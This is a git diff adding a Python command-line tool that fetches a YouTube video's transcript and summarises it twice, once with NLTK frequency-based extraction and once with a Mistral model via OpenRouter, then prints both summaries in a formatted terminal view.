index 00000000..bdb80f54
--- /dev/null
+++ b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
@@ -0,0 +1,319 @@
+import os
+import sys
+import nltk
+import pytube
+from youtube_transcript_api import YouTubeTranscriptApi
+from nltk.corpus import stopwords
+from nltk.tokenize import sent_tokenize, word_tokenize
+from nltk.probability import FreqDist
+from heapq import nlargest
+from urllib.parse import urlparse, parse_qs
+import textwrap
+from colorama import Fore, Back, Style, init
+from openai import OpenAI
+
+# Initialize colorama for cross-platform colored terminal output
+init(autoreset=True)
+
+# Download necessary NLTK data
+nltk.download('punkt_tab', quiet=True)
+nltk.download('punkt', quiet=True)
+nltk.download('stopwords', quiet=True)
+
+# Initialize OpenAI client from environment variable
+# Expect the OpenRouter API key to be provided via OPENROUTER_API_KEY
+api_key = os.getenv("OPENROUTER_API_KEY")
+if not api_key:
+    print(Fore.RED + "Error: OPENROUTER_API_KEY environment variable is not set or is still the placeholder ('<api_key>').")
+    sys.exit(1)
+else:
+    client = OpenAI(
+        base_url="https://openrouter.ai/api/v1",
+        api_key=api_key,
+    )
+
+def extract_video_id(youtube_url):
+    """Extract the video ID from a YouTube URL."""
+    parsed_url = urlparse(youtube_url)
+    
+    if parsed_url.netloc == 'youtu.be':
+        return parsed_url.path[1:]
+    
+    if parsed_url.netloc in ('www.youtube.com', 'youtube.com'):
+        if parsed_url.path == '/watch':
+            return parse_qs(parsed_url.query)['v'][0]
+        elif parsed_url.path.startswith('/embed/'):
+            return parsed_url.path.split('/')[2]
+        elif parsed_url.path.startswith('/v/'):
+            return parsed_url.path.split('/')[2]
+    
+    # If no match found
+    raise ValueError(f"Could not extract video ID from URL: {youtube_url}")
+
+def get_transcript(video_id):
+    """Get the transcript of a YouTube video."""
+    try:
+        youtube_transcript_api = YouTubeTranscriptApi()
+        fetched_transcript = youtube_transcript_api.fetch(video_id)
+        full_transcript = " ".join([snippet.text for snippet in fetched_transcript.snippets])
+        return full_transcript.strip()
+    except Exception as e:
+        return f"Error retrieving transcript: {str(e)}."
+
+def summarize_text_nltk(text, num_sentences=5):
+    """Summarize text using frequency-based extractive summarization with NLTK."""
+    if not text or text.startswith("Error") or text.startswith("Transcript not available"):
+        return text
+    
+    # Tokenize the text into sentences and words
+    sentences = sent_tokenize(text)
+    
+    # If there are fewer sentences than requested, return all sentences
+    if len(sentences) <= num_sentences:
+        return text
+    
+    # Tokenize words and remove stopwords
+    stop_words = set(stopwords.words('english'))
+    words = word_tokenize(text.lower())
+    words = [word for word in words if word.isalnum() and word not in stop_words]
+    
+    # Calculate word frequencies
+    freq = FreqDist(words)
+    
+    # Score sentences based on word frequencies
+    sentence_scores = {}
+    for i, sentence in enumerate(sentences):
+        for word in word_tokenize(sentence.lower()):
+            if word in freq:
+                if i in sentence_scores:
+                    sentence_scores[i] += freq[word]
+                else:
+                    sentence_scores[i] = freq[word]
+    
+    # Get the top N sentences with highest scores
+    summary_sentences_indices = nlargest(num_sentences, sentence_scores, key=sentence_scores.get)
+    summary_sentences_indices.sort()  # Sort to maintain original order
+    
+    # Construct the summary
+    summary = ' '.join([sentences[i] for i in summary_sentences_indices])
+    return summary
+
+def summarize_text_ai(text, video_title, num_sentences=5):
+    """Summarize text using the Mistral AI model via OpenRouter."""
+    if not text or text.startswith("Error") or text.startswith("Transcript not available"):
+        return text
+    
+    # Truncate text if it's too long (models often have token limits)
+    max_chars = 15000  # Adjust based on model's context window
+    truncated_text = text[:max_chars] if len(text) > max_chars else text
+    
+    prompt = f"""Please provide a concise summary of the following YouTube video transcript.
+Title: {video_title}
+
+Transcript:
+{truncated_text}
+
+Create a clear, informative summary that captures the main points and key insights from the video.
+Your summary should be approximately {num_sentences} sentences long.
+"""
+    
+    try:
+        completion = client.chat.completions.create(
+            model="mistralai/mistral-small-3.1-24b-instruct:free",
+            messages=[
+                {
+                    "role": "user",
+                    "content": [
+                        {
+                            "type": "text",
+                            "text": prompt
+                        }
+                    ]
+                }
+            ]
+        )
+        return completion.choices[0].message.content
+    except Exception as e:
+        return f"Error generating AI summary: {str(e)}"
+
+def summarize_youtube_video(youtube_url, num_sentences=5):
+    """Main function to summarize a YouTube video's transcription."""
+    try:
+        video_id = extract_video_id(youtube_url)
+        transcript = get_transcript(video_id)
+        
+        # Get video title for context
+        try:
+            yt = pytube.YouTube(youtube_url)
+            video_title = yt.title
+            
+        except Exception as e:
+            video_title = "Unknown Title"
+
+        
+        # Generate both summaries
+        print(Fore.YELLOW + f"Generating AI summary with {num_sentences} sentences...")
+        ai_summary = summarize_text_ai(transcript, video_title, num_sentences)
+        
+        print(Fore.YELLOW + f"Generating NLTK summary with {num_sentences} sentences...")
+        nltk_summary = summarize_text_nltk(transcript, num_sentences)
+        
+        return {
+            "video_title": video_title,
+            "video_id": video_id,
+            "ai_summary": ai_summary,
+            "nltk_summary": nltk_summary,
+            "full_transcript_length": len(transcript.split()),
+            "nltk_summary_length": len(nltk_summary.split()),
+            "ai_summary_length": len(ai_summary.split()) if not ai_summary.startswith("Error") else 0
+        }
+    except Exception as e:
+        return {"error": str(e)}
+
+def format_time(seconds):
+    """Convert seconds to a readable time format."""
+    hours, remainder = divmod(seconds, 3600)
+    minutes, seconds = divmod(remainder, 60)
+    
+    if hours > 0:
+        return f"{hours}h {minutes}m {seconds}s"
+    elif minutes > 0:
+        return f"{minutes}m {seconds}s"
+    else:
+        return f"{seconds}s"
+
+def format_number(number):
+    """Format large numbers with commas for readability."""
+    return "{:,}".format(number)
+
+def print_boxed_text(text, width=80, title=None, color=Fore.WHITE):
+    """Print text in a nice box with optional title."""
+    wrapper = textwrap.TextWrapper(width=width-4)  # -4 for the box margins
+    wrapped_text = wrapper.fill(text)
+    lines = wrapped_text.split('\n')
+    
+    # Print top border with optional title
+    if title:
+        title_space = width - 4 - len(title)
+        left_padding = title_space // 2
+        right_padding = title_space - left_padding
+        print(color + '┌' + '─' * left_padding + title + '─' * right_padding + '┐')
+    else:
+        print(color + '┌' + '─' * (width-2) + '┐')
+    
+    # Print content
+    for line in lines:
+        padding = width - 2 - len(line)
+        print(color + '│ ' + line + ' ' * padding + '│')
+    
+    # Print bottom border
+    print(color + '└' + '─' * (width-2) + '┘')
+
+def print_summary_result(result, width=80):
+    """Print the summary result in a nicely formatted way."""
+    if "error" in result:
+        print_boxed_text(f"Error: {result['error']}", width=width, title="ERROR", color=Fore.RED)
+        return
+    
+    # Terminal width
+    terminal_width = width
+    
+    # Print header with video information
+    print("\n" + Fore.CYAN + "=" * terminal_width)
+    print(Fore.CYAN + Style.BRIGHT + result['video_title'].center(terminal_width))
+    print(Fore.CYAN + "=" * terminal_width + "\n")
+    
+    # Video metadata section
+    print(Fore.YELLOW + Style.BRIGHT + "VIDEO INFORMATION".center(terminal_width))
+    print(Fore.YELLOW + "─" * terminal_width)
+    
+    # Two-column layout for metadata
+    col_width = terminal_width // 2 - 2
+    
+    # Row 3
+    print(f"{Fore.GREEN}Video ID: {Fore.WHITE}{result['video_id']:<{col_width}}"
+          f"{Fore.GREEN}URL: {Fore.WHITE}https://youtu.be/{result['video_id']}")
+    
+    print(Fore.YELLOW + "─" * terminal_width + "\n")
+    
+    # AI Summary section
+    ai_compression = "N/A"
+    if result['ai_summary_length'] > 0:
+        ai_compression = round((1 - result['ai_summary_length'] / result['full_transcript_length']) * 100)
+    
+    ai_summary_title = f" AI SUMMARY ({result['ai_summary_length']} words, condensed {ai_compression}% from {result['full_transcript_length']} words) "
+    
+    print(Fore.GREEN + Style.BRIGHT + ai_summary_title.center(terminal_width))
+    print(Fore.GREEN + "─" * terminal_width)
+    
+    # Print the AI summary with proper wrapping
+    wrapper = textwrap.TextWrapper(width=terminal_width-4, 
+                                  initial_indent='  ', 
+                                  subsequent_indent='  ')
+    
+    # Split AI summary into paragraphs and print each
+    ai_paragraphs = result['ai_summary'].split('\n')
+    for paragraph in ai_paragraphs:
+        if paragraph.strip():  # Skip empty paragraphs
+            print(wrapper.fill(paragraph))
+            print()  # Empty line between paragraphs
+    
+    print(Fore.GREEN + "─" * terminal_width + "\n")
+    
+    # NLTK Summary section
+    nltk_compression = round((1 - result['nltk_summary_length'] / result['full_transcript_length']) * 100)
+    nltk_summary_title = f" NLTK SUMMARY ({result['nltk_summary_length']} words, condensed {nltk_compression}% from {result['full_transcript_length']} words) "
+    
+    print(Fore.MAGENTA + Style.BRIGHT + nltk_summary_title.center(terminal_width))
+    print(Fore.MAGENTA + "─" * terminal_width)
+    
+    # Split NLTK summary into paragraphs and wrap each
+    paragraphs = result['nltk_summary'].split('. ')
+    formatted_paragraphs = []
+    
+    current_paragraph = ""
+    for sentence in paragraphs:
+        if not sentence.endswith('.'):
+            sentence += '.'
+        
+        if len(current_paragraph) + len(sentence) + 1 <= 150:  # Arbitrary length for paragraph
+            current_paragraph += " " + sentence if current_paragraph else sentence
+        else:
+            if current_paragraph:
+                formatted_paragraphs.append(current_paragraph)
+            current_paragraph = sentence
+    
+    if current_paragraph:
+        formatted_paragraphs.append(current_paragraph)
+    
+    # Print each paragraph
+    for paragraph in formatted_paragraphs:
+        print(wrapper.fill(paragraph))
+        print()  # Empty line between paragraphs
+    
+    print(Fore.MAGENTA + "─" * terminal_width + "\n")
+
+
+if __name__ == "__main__":
+    # Get terminal width
+    try:
+        terminal_width = os.get_terminal_size().columns
+        # Limit width to reasonable range
+        terminal_width = max(80, min(terminal_width, 120))
+    except:
+        terminal_width = 80  # Default if can't determine
+    
+    # Print welcome banner
+    print(Fore.CYAN + Style.BRIGHT + "\n" + "=" * terminal_width)
+    print(Fore.CYAN + Style.BRIGHT + "YOUTUBE VIDEO SUMMARIZER".center(terminal_width))
+    print(Fore.CYAN + Style.BRIGHT + "=" * terminal_width + "\n")
+    
+    youtube_url = input(Fore.GREEN + "Enter YouTube video URL: " + Fore.WHITE)
+    
+    num_sentences_input = input(Fore.GREEN + "Enter number of sentences for summaries (default 5): " + Fore.WHITE)
+    num_sentences = int(num_sentences_input) if num_sentences_input.strip() else 5
+    
+    print(Fore.YELLOW + "\nFetching and analyzing video transcript... Please wait...\n")
+    
+    result = summarize_youtube_video(youtube_url, num_sentences)
+    print_summary_result(result, width=terminal_width)